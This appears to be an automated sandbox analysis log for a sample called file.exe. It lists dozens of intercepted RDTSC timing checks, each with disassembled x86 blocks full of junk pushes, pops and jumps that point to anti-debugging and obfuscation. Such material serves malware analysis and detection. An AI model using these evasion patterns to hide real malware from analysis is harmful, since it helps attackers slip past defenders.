Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7445DA second address: 7445F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744DC6 second address: 744DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB23 second address: 74DB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB27 second address: 74DB5C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60A4BE8BD6h 0x00000008 jmp 00007F60A4BE8BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60A4BE8BDDh 0x00000016 jnp 00007F60A4BE8BD6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB5C second address: 74DB7A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F60A4E98F03h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB7A second address: 74DB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB85 second address: 74DB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DCFB second address: 74DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DCFF second address: 74DD17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60A4E98EFAh 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F60A4E98EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DFBD second address: 74DFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DFC1 second address: 74DFD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F60A4E98EF6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E1A2 second address: 74E1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE2h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F60A4BE8BD6h 0x00000013 jmp 00007F60A4BE8BE4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E1D7 second address: 74E1E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F60A4E98EF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E484 second address: 74E4A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60A4BE8BDAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60A4BE8BE2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD5AC second address: 6FD5B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74ECEE second address: 74ECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74ECF2 second address: 74ECFC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74ECFC second address: 74ED16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F60A4BE8BE8h 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jo 00007F60A4BE8BDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7536BC second address: 7536D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7536D1 second address: 7536FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F60A4BE8BE3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71437D second address: 6FC986 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60A4E98EF8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F60A4E98EFFh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F60A4E98EF8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d lea eax, dword ptr [ebp+12479095h] 0x00000033 xor ecx, dword ptr [ebp+122D2E96h] 0x00000039 nop 0x0000003a jmp 00007F60A4E98EFCh 0x0000003f push eax 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007F60A4E98EFEh 0x00000047 jno 00007F60A4E98EF6h 0x0000004d popad 0x0000004e pop eax 0x0000004f nop 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007F60A4E98EF8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a call dword ptr [ebp+122D2B1Dh] 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F60A4E98F00h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7149F5 second address: 7149F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714B0C second address: 714B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F60A4E98EF6h 0x0000000a popad 0x0000000b jc 00007F60A4E98EFCh 0x00000011 jnp 00007F60A4E98EF6h 0x00000017 popad 0x00000018 xor dword ptr [esp], 5E3A5D33h 0x0000001f mov dword ptr [ebp+122D3022h], edx 0x00000025 jbe 00007F60A4E98F19h 0x0000002b call 00007F60A4E98F04h 0x00000030 call 00007F60A4E98EFDh 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 push 86A60484h 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F60A4E98EF8h 0x00000044 push esi 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714CB1 second address: 714CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7153C3 second address: 7153C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7153C8 second address: 715429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F60A4BE8BD8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 0000001Eh 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F60A4BE8BD8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jne 00007F60A4BE8BD8h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715727 second address: 71572D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71572D second address: 715731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715731 second address: 715735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7157F4 second address: 715802 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715802 second address: 71581F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71581F second address: 715878 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D2D7Ah] 0x0000000f lea eax, dword ptr [ebp+124790D9h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F60A4BE8BD8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov ecx, dword ptr [ebp+122D2D0Eh] 0x00000035 movsx edi, ax 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jnc 00007F60A4BE8BD6h 0x00000042 jmp 00007F60A4BE8BE3h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715878 second address: 7158CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F60A4E98EF6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F60A4E98F09h 0x00000016 lea eax, dword ptr [ebp+12479095h] 0x0000001c pushad 0x0000001d mov ecx, 260CD041h 0x00000022 xor dword ptr [ebp+122D2FA0h], edi 0x00000028 popad 0x00000029 nop 0x0000002a jns 00007F60A4E98EFAh 0x00000030 push eax 0x00000031 je 00007F60A4E98F12h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7158CB second address: 7158CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7158CF second address: 6FD5AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F60A4E98EF8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jns 00007F60A4E98EFCh 0x0000002a call dword ptr [ebp+122D23B5h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753B74 second address: 753B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753FFC second address: 75401D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F60A4E98EF6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F60A4E98F01h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541B5 second address: 7541CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541CB second address: 7541CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541CF second address: 7541EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 758F8B second address: 758F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 758F91 second address: 758F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60A4BE8BD6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759547 second address: 75958A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFBh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98F00h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F60A4E98EF6h 0x0000001a jmp 00007F60A4E98F08h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75958A second address: 75958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75958E second address: 759594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759594 second address: 75959A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75959A second address: 7595A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7595A4 second address: 7595B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F60A4BE8BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759B63 second address: 759B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759B67 second address: 759B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760077 second address: 760081 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60A4E98EF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75F961 second address: 75F971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F60A4BE8BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75F971 second address: 75F976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75F976 second address: 75F982 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60A4BE8BDEh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 767025 second address: 76702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76702C second address: 767049 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60A4BE8BDEh 0x00000008 ja 00007F60A4BE8BD6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnc 00007F60A4BE8BD6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766488 second address: 76648C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76648C second address: 766498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766498 second address: 7664AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F01h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7664AF second address: 7664B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7664B4 second address: 7664B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7665FC second address: 766610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766775 second address: 766779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7668B9 second address: 7668C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F60A4BE8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76C3A6 second address: 76C3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F01h 0x00000009 pop edx 0x0000000a jnp 00007F60A4E98EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76C111 second address: 76C11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F60A4BE8BD6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76C11D second address: 76C121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D3111 second address: 6D3115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770937 second address: 77093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770A61 second address: 770A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60A4BE8BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770A70 second address: 770A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770BDC second address: 770BEC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60A4BE8BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770BEC second address: 770BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770BF0 second address: 770BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7151AA second address: 7151B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F60A4E98EF6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7151B8 second address: 7151CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BDAh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7710EF second address: 7710F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77A3AE second address: 77A3DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F60A4BE8BE6h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F60A4BE8BDDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778328 second address: 778331 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778331 second address: 778337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778337 second address: 77833D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77833D second address: 77835F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778482 second address: 778488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778488 second address: 77848C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77848C second address: 7784B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60A4E98EFAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7784B2 second address: 7784C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778655 second address: 77867D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F60A4E98EF6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F60A4E98F09h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778F5B second address: 778F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7797C3 second address: 779801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F05h 0x00000007 jno 00007F60A4E98F11h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
